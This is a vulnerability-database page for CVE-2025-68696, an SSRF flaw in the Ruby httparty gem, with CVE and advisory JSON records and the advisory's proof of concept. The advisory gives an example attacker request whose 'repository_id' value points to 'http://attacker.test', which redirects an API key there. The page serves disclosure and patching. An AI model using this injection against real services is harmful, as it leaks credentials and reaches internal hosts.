cvelistv5 - CVE-2025-68696

CVE-2025-68696 (GCVE-0-2025-68696)

Vulnerability from cvelistv5 – Published: 2025-12-23 22:59 – Updated: 2025-12-24 14:31

Title

httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage

Summary

httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd.

Severity ?

7.8 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/jnunemaker/httparty/security/a…	x_refsource_CONFIRM
	https://github.com/jnunemaker/httparty/commit/052…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	jnunemaker	httparty	Affected: <= 0.23.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-68696",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-12-24T14:31:55.287593Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-24T14:31:58.017Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "httparty",
          "vendor": "jnunemaker",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 0.23.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "LOW"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-23T22:59:04.201Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4"
        },
        {
          "name": "https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240"
        }
      ],
      "source": {
        "advisory": "GHSA-hm5p-x4rq-38w4",
        "discovery": "UNKNOWN"
      },
      "title": "httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-68696",
    "datePublished": "2025-12-23T22:59:04.201Z",
    "dateReserved": "2025-12-23T17:11:35.076Z",
    "dateUpdated": "2025-12-24T14:31:58.017Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-68696\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-23T23:15:45.627\",\"lastModified\":\"2025-12-24T15:16:04.153\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"LOW\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"references\":[{\"url\":\"https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-68696\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-24T14:31:55.287593Z\"}}}], \"references\": [{\"url\": \"https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-12-24T14:31:44.582Z\"}}], \"cna\": {\"title\": \"httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage\", \"source\": {\"advisory\": \"GHSA-hm5p-x4rq-38w4\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"LOW\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"jnunemaker\", \"product\": \"httparty\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 0.23.2\"}]}], \"references\": [{\"url\": \"https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4\", \"name\": \"https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240\", \"name\": \"https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-23T22:59:04.201Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-68696\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-24T14:31:58.017Z\", \"dateReserved\": \"2025-12-23T17:11:35.076Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-23T22:59:04.201Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-HM5P-X4RQ-38W4

Vulnerability from github – Published: 2025-12-23 19:31 – Updated: 2025-12-26 17:25

Summary

httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage

Details

Summary

There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.

Details

When httparty receives a path argument that is an absolute URL, it ignores the base_uri field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.

Consider the following example of a web application:

require 'sinatra'
require 'httparty'

class RepositoryClient
  include HTTParty
  base_uri 'http://exmaple.test/api/v1/repositories/'
  headers 'X-API-KEY' => '1234567890'
end

post '/issue' do
  request_body = JSON.parse(request.body.read)
  RepositoryClient.get(request_body['repository_id']).body
  # do something
  json message: 'OK'
end

Now, suppose an attacker sends a request like this:

POST /issue HTTP/1.1
Host: localhost:10000
Content-Type: application/json

{
    "repository_id": "http://attacker.test",
    "title": "test"
}

In this case, httparty sends the X-API-KEY not to http://example.test but instead to http://attacker.test.

A similar problem was reported and fixed in the HTTP client library axios in the past:
https://github.com/axios/axios/issues/6463

Also, Python's urljoin function has documented a warning about similar behavior:
https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin

PoC

Follow these steps to reproduce the issue:

Set up two simple HTTP servers.

bash mkdir /tmp/server1 /tmp/server2 echo "this is server1" > /tmp/server1/index.html echo "this is server2" > /tmp/server2/index.html python -m http.server -d /tmp/server1 10001 & python -m http.server -d /tmp/server2 10002 &

Create a script (for example, main.rb):

```rb require 'httparty'

class Client include HTTParty base_uri 'http://localhost:10001' end

data = Client.get('http://localhost:10002').body puts data ```

Run the script:

bash $ ruby main.rb this is server2

Although base_uri is set to http://localhost:10001/, httparty sends the request to http://localhost:10002/.

Impact

Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
Affected users: Any software that uses base_uri and does not properly validate the path parameter may be affected by this issue.

Severity ?

7.8 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "httparty"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.23.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68696"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-23T19:31:10Z",
    "nvd_published_at": "2025-12-23T23:15:45Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThere may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.\n\n## Details\n\nWhen httparty receives a path argument that is an absolute URL, it ignores the `base_uri` field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.\n\nConsider the following example of a web application:\n\n```rb\nrequire \u0027sinatra\u0027\nrequire \u0027httparty\u0027\n\nclass RepositoryClient\n  include HTTParty\n  base_uri \u0027http://exmaple.test/api/v1/repositories/\u0027\n  headers \u0027X-API-KEY\u0027 =\u003e \u00271234567890\u0027\nend\n\npost \u0027/issue\u0027 do\n  request_body = JSON.parse(request.body.read)\n  RepositoryClient.get(request_body[\u0027repository_id\u0027]).body\n  # do something\n  json message: \u0027OK\u0027\nend\n```\n\nNow, suppose an attacker sends a request like this:\n\n```\nPOST /issue HTTP/1.1\nHost: localhost:10000\nContent-Type: application/json\n\n{\n    \"repository_id\": \"http://attacker.test\",\n    \"title\": \"test\"\n}\n```\n\nIn this case, httparty sends the `X-API-KEY` not to `http://example.test` but instead to `http://attacker.test`.\n\nA similar problem was reported and fixed in the HTTP client library axios in the past:  \n\u003chttps://github.com/axios/axios/issues/6463\u003e\n\nAlso, Python\u0027s `urljoin` function has documented a warning about similar behavior:  \n\u003chttps://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin\u003e\n\n## PoC\n\nFollow these steps to reproduce the issue:\n\n1. Set up two simple HTTP servers.\n\n   ```bash\n   mkdir /tmp/server1 /tmp/server2\n   echo \"this is server1\" \u003e /tmp/server1/index.html \n   echo \"this is server2\" \u003e /tmp/server2/index.html\n   python -m http.server -d /tmp/server1 10001 \u0026\n   python -m http.server -d /tmp/server2 10002 \u0026\n   ```\n\n2. Create a script (for example, `main.rb`):\n\n   ```rb\n   require \u0027httparty\u0027\n\n   class Client\n     include HTTParty\n     base_uri \u0027http://localhost:10001\u0027\n   end\n\n   data = Client.get(\u0027http://localhost:10002\u0027).body\n   puts data\n   ```\n\n3. Run the script:\n\n   ```bash\n   $ ruby main.rb\n   this is server2\n   ```\n\nAlthough `base_uri` is set to `http://localhost:10001/`, httparty sends the request to `http://localhost:10002/`.\n\n\n## Impact\n\n- Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.  \n- SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.  \n- Affected users: Any software that uses `base_uri` and does not properly validate the path parameter may be affected by this issue.",
  "id": "GHSA-hm5p-x4rq-38w4",
  "modified": "2025-12-26T17:25:12Z",
  "published": "2025-12-23T19:31:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68696"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jnunemaker/httparty"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage"
}

FKIE_CVE-2025-68696

Vulnerability from fkie_nvd - Published: 2025-12-23 23:15 - Updated: 2025-12-24 15:16

Severity ?

7.8 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240
	security-advisories@github.com	https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd."
    }
  ],
  "id": "CVE-2025-68696",
  "lastModified": "2025-12-24T15:16:04.153",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "LOW",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-23T23:15:45.627",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-68696 (GCVE-0-2025-68696)

GHSA-HM5P-X4RQ-38W4

Summary

Details

PoC

Impact

FKIE_CVE-2025-68696

Tags

Sightings

Nomenclature